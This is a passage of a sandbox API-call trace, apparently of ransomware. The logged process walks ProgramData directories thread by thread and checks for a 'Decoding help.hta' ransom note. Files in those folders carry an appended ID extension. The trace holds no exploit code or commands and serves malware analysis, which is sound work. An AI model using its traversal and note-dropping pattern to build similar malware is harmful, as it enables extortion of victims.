lpFindFileData=0x1a15fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x50ea0e30, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x22f18830, ftLastAccessTime.dwHighDateTime=0x1d526b8, ftLastWriteTime.dwLowDateTime=0x22f18830, ftLastWriteTime.dwHighDateTime=0x1d526b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0044.925] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0044.925] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0044.925] FindNextFileW (in: hFindFile=0x5e27f0, lpFindFileData=0x1a15fd30 | out: lpFindFileData=0x1a15fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8ab1ae70, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x9de525d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x9de525d0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Cache", cAlternateFileName="")) returned 1 [0044.925] lstrcmpW (lpString1=".", lpString2="Cache") returned -1 [0044.925] lstrcmpW (lpString1="..", lpString2="Cache") returned -1 [0044.925] lstrcmpiW (lpString1="windows", lpString2="Cache") returned 1 [0044.926] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\OfficeSoftwareProtectionPlatform\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\OfficeSoftwareProtectionPlatform\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\OfficeSoftwareProtectionPlatform\\*.*" [0044.926] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Microsoft\\OfficeSoftwareProtectionPlatform\\*.*") returned 69 [0044.926] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\OfficeSoftwareProtectionPlatform\\", lpString2="Cache" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\OfficeSoftwareProtectionPlatform\\Cache") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\OfficeSoftwareProtectionPlatform\\Cache" [0044.926] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\OfficeSoftwareProtectionPlatform\\Cache", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\OfficeSoftwareProtectionPlatform\\Cache\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\OfficeSoftwareProtectionPlatform\\Cache\\*.*" [0044.926] GlobalMemoryStatus (in: lpBuffer=0x1a15fd10 | out: lpBuffer=0x1a15fd10) [0044.926] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x41d84c0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x458 [0044.933] CloseHandle (hObject=0x458) returned 1 [0044.933] FindNextFileW (in: hFindFile=0x5e27f0, lpFindFileData=0x1a15fd30 | out: lpFindFileData=0x1a15fd30*(dwFileAttributes=0x1, ftCreationTime.dwLowDateTime=0x22f18830, ftCreationTime.dwHighDateTime=0x1d526b8, ftLastAccessTime.dwLowDateTime=0x22f18830, ftLastAccessTime.dwHighDateTime=0x1d526b8, ftLastWriteTime.dwLowDateTime=0x22f18830, ftLastWriteTime.dwHighDateTime=0x1d526b8, nFileSizeHigh=0x0, nFileSizeLow=0x78e, dwReserved0=0x0, dwReserved1=0x0, cFileName="Decoding help.hta", cAlternateFileName="DECODI~1.HTA")) returned 1 [0044.933] lstrcpyW (in: lpString1=0x668fd0, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\OfficeSoftwareProtectionPlatform\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\OfficeSoftwareProtectionPlatform\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\OfficeSoftwareProtectionPlatform\\*.*" [0044.933] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Microsoft\\OfficeSoftwareProtectionPlatform\\*.*") returned 69 [0044.933] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\OfficeSoftwareProtectionPlatform\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\OfficeSoftwareProtectionPlatform\\Decoding help.hta") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\OfficeSoftwareProtectionPlatform\\Decoding help.hta" [0044.933] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\OfficeSoftwareProtectionPlatform\\Decoding help.hta" (normalized: "c:\\users\\all users\\microsoft\\officesoftwareprotectionplatform\\decoding help.hta")) returned 0x1 [0044.934] lstrcmpiW (lpString1="Decoding help.hta", lpString2="Decoding help.hta") returned 0 [0044.934] FindNextFileW (in: hFindFile=0x5e27f0, lpFindFileData=0x1a15fd30 | out: lpFindFileData=0x1a15fd30*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x8c015050, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0xfa44d4a0, ftLastAccessTime.dwHighDateTime=0x1d305fd, ftLastWriteTime.dwLowDateTime=0x63c5e40, ftLastWriteTime.dwHighDateTime=0x1d305fe, nFileSizeHigh=0x0, nFileSizeLow=0x469bd5, dwReserved0=0x0, dwReserved1=0x0, cFileName="tokens.dat.[ID]g9uZrLhJaygpwRm1[ID]", cAlternateFileName="TOKENS~1._ID")) returned 1 [0044.934] lstrcpyW (in: lpString1=0x668fd0, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\OfficeSoftwareProtectionPlatform\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\OfficeSoftwareProtectionPlatform\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\OfficeSoftwareProtectionPlatform\\*.*" [0044.934] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Microsoft\\OfficeSoftwareProtectionPlatform\\*.*") returned 69 [0044.934] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\OfficeSoftwareProtectionPlatform\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\OfficeSoftwareProtectionPlatform\\Decoding help.hta") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\OfficeSoftwareProtectionPlatform\\Decoding help.hta" [0044.934] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\OfficeSoftwareProtectionPlatform\\Decoding help.hta" (normalized: "c:\\users\\all users\\microsoft\\officesoftwareprotectionplatform\\decoding help.hta")) returned 0x1 [0044.934] lstrcmpiW (lpString1="Decoding help.hta", lpString2="tokens.dat.[ID]g9uZrLhJaygpwRm1[ID]") returned -1 [0044.934] lstrlenW (lpString="tokens.dat.[ID]g9uZrLhJaygpwRm1[ID]") returned 35 [0044.934] lstrcmpiW (lpString1="[ID]", lpString2="[ID]") returned 0 [0044.934] FindNextFileW (in: hFindFile=0x5e27f0, lpFindFileData=0x1a15fd30 | out: lpFindFileData=0x1a15fd30*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x8c015050, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0xfa44d4a0, ftLastAccessTime.dwHighDateTime=0x1d305fd, ftLastWriteTime.dwLowDateTime=0x63c5e40, ftLastWriteTime.dwHighDateTime=0x1d305fe, nFileSizeHigh=0x0, nFileSizeLow=0x469bd5, dwReserved0=0x0, dwReserved1=0x0, cFileName="tokens.dat.[ID]g9uZrLhJaygpwRm1[ID]", cAlternateFileName="TOKENS~1._ID")) returned 0 [0044.934] FindClose (in: hFindFile=0x5e27f0 | out: hFindFile=0x5e27f0) returned 1 Thread: id = 406 os_tid = 0xb34 [0043.882] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC\\*.*", lpFindFileData=0x1a29fd30 | out: lpFindFileData=0x1a29fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfd9b5b52, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd9b5b52, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd9b5b52, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5e2830 [0044.931] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0044.931] FindNextFileW (in: hFindFile=0x5e2830, lpFindFileData=0x1a29fd30 | out: lpFindFileData=0x1a29fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfd9b5b52, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd9b5b52, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd9b5b52, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0044.931] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0044.931] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0044.931] FindNextFileW (in: hFindFile=0x5e2830, lpFindFileData=0x1a29fd30 | out: lpFindFileData=0x1a29fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfd9b5b52, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd9b5b52, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xd6e33921, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Outbound", cAlternateFileName="")) returned 1 [0044.931] lstrcmpW (lpString1=".", lpString2="Outbound") returned -1 [0044.931] lstrcmpW (lpString1="..", lpString2="Outbound") returned -1 [0044.931] lstrcmpiW (lpString1="windows", lpString2="Outbound") returned 1 [0044.931] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC\\*.*" [0044.931] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC\\*.*") returned 40 [0044.931] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC\\", lpString2="Outbound" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC\\Outbound") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC\\Outbound" [0044.931] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC\\Outbound", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC\\Outbound\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC\\Outbound\\*.*" [0044.931] GlobalMemoryStatus (in: lpBuffer=0x1a29fd10 | out: lpBuffer=0x1a29fd10) [0044.931] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x4238660, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x23c [0044.942] CloseHandle (hObject=0x23c) returned 1 [0044.942] FindNextFileW (in: hFindFile=0x5e2830, lpFindFileData=0x1a29fd30 | out: lpFindFileData=0x1a29fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfd9b5b52, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfc64e30, ftLastAccessTime.dwHighDateTime=0x1d526b8, ftLastWriteTime.dwLowDateTime=0xfc64e30, ftLastWriteTime.dwHighDateTime=0x1d526b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PublishedData", cAlternateFileName="PUBLIS~1")) returned 1 [0044.942] lstrcmpW (lpString1=".", lpString2="PublishedData") returned -1 [0044.942] lstrcmpW (lpString1="..", lpString2="PublishedData") returned -1 [0044.942] lstrcmpiW (lpString1="windows", lpString2="PublishedData") returned 1 [0044.942] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC\\*.*" [0044.942] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC\\*.*") returned 40 [0044.942] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC\\", lpString2="PublishedData" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC\\PublishedData") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC\\PublishedData" [0044.942] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC\\PublishedData", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC\\PublishedData\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC\\PublishedData\\*.*" [0044.942] GlobalMemoryStatus (in: lpBuffer=0x1a29fd10 | out: lpBuffer=0x1a29fd10) [0044.943] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x110e39a8, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x23c [0044.954] CloseHandle (hObject=0x23c) returned 1 [0044.954] FindNextFileW (in: hFindFile=0x5e2830, lpFindFileData=0x1a29fd30 | out: lpFindFileData=0x1a29fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfd9b5b52, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfc64e30, ftLastAccessTime.dwHighDateTime=0x1d526b8, ftLastWriteTime.dwLowDateTime=0xfc64e30, ftLastWriteTime.dwHighDateTime=0x1d526b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="StateData", cAlternateFileName="STATED~1")) returned 1 [0044.954] lstrcmpW (lpString1=".", lpString2="StateData") returned -1 [0044.955] lstrcmpW (lpString1="..", lpString2="StateData") returned -1 [0044.955] lstrcmpiW (lpString1="windows", lpString2="StateData") returned 1 [0044.955] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC\\*.*" [0044.955] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC\\*.*") returned 40 [0044.955] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC\\", lpString2="StateData" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC\\StateData") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC\\StateData" [0044.955] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC\\StateData", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC\\StateData\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC\\StateData\\*.*" [0044.955] GlobalMemoryStatus (in: lpBuffer=0x1a29fd10 | out: lpBuffer=0x1a29fd10) [0044.955] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x112d4168, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x23c [0044.967] CloseHandle (hObject=0x23c) returned 1 [0044.967] FindNextFileW (in: hFindFile=0x5e2830, lpFindFileData=0x1a29fd30 | out: lpFindFileData=0x1a29fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfd9b5b52, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd49670, ftLastAccessTime.dwHighDateTime=0x1d526b8, ftLastWriteTime.dwLowDateTime=0xfd49670, ftLastWriteTime.dwHighDateTime=0x1d526b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Temp", cAlternateFileName="")) returned 1 [0044.967] lstrcmpW (lpString1=".", lpString2="Temp") returned -1 [0044.967] lstrcmpW (lpString1="..", lpString2="Temp") returned -1 [0044.967] lstrcmpiW (lpString1="windows", lpString2="Temp") returned 1 [0044.967] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC\\*.*" [0044.967] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC\\*.*") returned 40 [0044.967] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC\\", lpString2="Temp" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC\\Temp") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC\\Temp" [0044.967] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC\\Temp", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC\\Temp\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC\\Temp\\*.*" [0044.967] GlobalMemoryStatus (in: lpBuffer=0x1a29fd10 | out: lpBuffer=0x1a29fd10) [0044.967] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x95c9c18, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x23c [0044.981] CloseHandle (hObject=0x23c) returned 1 [0044.981] FindNextFileW (in: hFindFile=0x5e2830, lpFindFileData=0x1a29fd30 | out: lpFindFileData=0x1a29fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfd9b5b52, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd49670, ftLastAccessTime.dwHighDateTime=0x1d526b8, ftLastWriteTime.dwLowDateTime=0xfd49670, ftLastWriteTime.dwHighDateTime=0x1d526b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Temp", cAlternateFileName="")) returned 0 [0044.981] FindClose (in: hFindFile=0x5e2830 | out: hFindFile=0x5e2830) returned 1 Thread: id = 407 os_tid = 0xb00 [0043.882] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Search\\*.*", lpFindFileData=0x1a3dfd30 | out: lpFindFileData=0x1a3dfd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x27df8b60, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x27df8b60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x27df8b60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5e2870 [0044.941] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0044.941] FindNextFileW (in: hFindFile=0x5e2870, lpFindFileData=0x1a3dfd30 | out: lpFindFileData=0x1a3dfd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x27df8b60, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x27df8b60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x27df8b60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0044.941] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0044.941] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0044.941] FindNextFileW (in: hFindFile=0x5e2870, lpFindFileData=0x1a3dfd30 | out: lpFindFileData=0x1a3dfd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x27df8b60, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x27e6af80, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x27e6af80, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Data", cAlternateFileName="")) returned 1 [0044.941] lstrcmpW (lpString1=".", lpString2="Data") returned -1 [0044.941] lstrcmpW (lpString1="..", lpString2="Data") returned -1 [0044.941] lstrcmpiW (lpString1="windows", lpString2="Data") returned 1 [0044.941] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\Search\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Search\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Search\\*.*" [0044.941] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Microsoft\\Search\\*.*") returned 43 [0044.941] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Search\\", lpString2="Data" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Search\\Data") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Search\\Data" [0044.941] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Search\\Data", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Search\\Data\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Search\\Data\\*.*" [0044.941] GlobalMemoryStatus (in: lpBuffer=0x1a3dfd10 | out: lpBuffer=0x1a3dfd10) [0044.941] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x112a4098, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x464 [0044.954] CloseHandle (hObject=0x464) returned 1 [0044.954] FindNextFileW (in: hFindFile=0x5e2870, lpFindFileData=0x1a3dfd30 | out: lpFindFileData=0x1a3dfd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x27df8b60, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x27e6af80, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x27e6af80, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Data", cAlternateFileName="")) returned 0 [0044.954] FindClose (in: hFindFile=0x5e2870 | out: hFindFile=0x5e2870) returned 1 Thread: id = 408 os_tid = 0xb30 [0043.883] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\*.*", lpFindFileData=0x1a51fd30 | out: lpFindFileData=0x1a51fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfaaff840, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0x23153cd0, ftLastAccessTime.dwHighDateTime=0x1d526b8, ftLastWriteTime.dwLowDateTime=0x23153cd0, ftLastWriteTime.dwHighDateTime=0x1d526b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5e28b0 [0044.950] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0044.950] FindNextFileW (in: hFindFile=0x5e28b0, lpFindFileData=0x1a51fd30 | out: lpFindFileData=0x1a51fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfaaff840, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0x23153cd0, ftLastAccessTime.dwHighDateTime=0x1d526b8, ftLastWriteTime.dwLowDateTime=0x23153cd0, ftLastWriteTime.dwHighDateTime=0x1d526b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0044.950] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0044.950] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0044.950] FindNextFileW (in: hFindFile=0x5e28b0, lpFindFileData=0x1a51fd30 | out: lpFindFileData=0x1a51fd30*(dwFileAttributes=0x1, ftCreationTime.dwLowDateTime=0x23049330, ftCreationTime.dwHighDateTime=0x1d526b8, ftLastAccessTime.dwLowDateTime=0x23049330, ftLastAccessTime.dwHighDateTime=0x1d526b8, ftLastWriteTime.dwLowDateTime=0x230955f0, ftLastWriteTime.dwHighDateTime=0x1d526b8, nFileSizeHigh=0x0, nFileSizeLow=0x78e, dwReserved0=0x0, dwReserved1=0x0, cFileName="Decoding help.hta", cAlternateFileName="DECODI~1.HTA")) returned 1 [0044.950] lstrcpyW (in: lpString1=0x668fd0, lpString2="\\\\?\\C:\\Users\\All Users\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\*.*" [0044.950] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\*.*") returned 79 [0044.950] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\Decoding help.hta") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\Decoding help.hta" [0044.951] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\Decoding help.hta" (normalized: "c:\\users\\all users\\package cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\decoding help.hta")) returned 0x1 [0044.951] lstrcmpiW (lpString1="Decoding help.hta", lpString2="Decoding help.hta") returned 0 [0044.951] FindNextFileW (in: hFindFile=0x5e28b0, lpFindFileData=0x1a51fd30 | out: lpFindFileData=0x1a51fd30*(dwFileAttributes=0x1, ftCreationTime.dwLowDateTime=0xfaaff840, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0xfaaff840, ftLastAccessTime.dwHighDateTime=0x1d2e620, ftLastWriteTime.dwLowDateTime=0x23153cd0, ftLastWriteTime.dwHighDateTime=0x1d526b8, nFileSizeHigh=0x0, nFileSizeLow=0x88e, dwReserved0=0x0, dwReserved1=0x0, cFileName="state.rsm.[ID]g9uZrLhJaygpwRm1[ID]", cAlternateFileName="STATER~1._ID")) returned 1 [0044.951] lstrcpyW (in: lpString1=0x668fd0, lpString2="\\\\?\\C:\\Users\\All Users\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\*.*" [0044.951] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\*.*") returned 79 [0044.951] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\Decoding help.hta") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\Decoding help.hta" [0044.951] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\Decoding help.hta" (normalized: "c:\\users\\all users\\package 